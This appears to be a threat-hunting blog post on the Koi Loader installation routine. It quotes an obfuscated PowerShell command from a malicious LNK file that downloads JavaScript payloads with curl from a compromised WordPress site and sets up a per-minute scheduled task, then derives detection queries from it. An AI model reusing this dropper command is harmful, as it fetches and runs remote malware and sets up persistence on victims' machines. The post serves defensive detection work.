175. Hunting Koi Loader Installation Routine

Hello everyone!

Malware installation routines are noisy. Most of the time. What does it mean? We can transform this noise into detection and hunting ideas!

Let's look at Koi Loader. It's commonly delivered with help of malicious LNK-files, like this one. So, it executes the following command:

powershell.exe -command $q7hl1gh07lmh4rm = 'ws'+'cr'+'ip' + 't ' + '%ProgramData%\' + ('nblxsl7b2fdze5.js wg3c86ft8'); & ('cu'+'r'+'l.ex'+'e') -sL -o nblxsl7b2fdze5.js 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php'; & ('cur'+'l.e'+'xe') -s -o e8p1xhlnt1xd -L 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/pseudophilanthropicalgjxR.php'; mv e8p1xhlnt1xd wg3c86ft8.js; . ('sc'+'hta' + 'sks') /create /sc minute /f /mo 1 /tr $q7hl1gh07lmh4rm /tn wg3c86ft8;

As you can see, here we can see lots of detection and hunting opportunities! Let's start from abusing PowerShell to create a scheduled task:

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("create" AND "minute")

Next thing, abusing curl.exe to download a malicious file from a compromised WordPress website:

event_type: "processcreatewin"

AND

proc_file_name: "curl.exe"

AND

cmdline: "wp-content"

Finally, let's hunt for suspicious JS files executed from %ProgramData% subfolders:

event_type: "processcreatewin"

AND

proc_file_name: "wscript.exe"

AND

cmdline: ("programdata" AND *js")

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge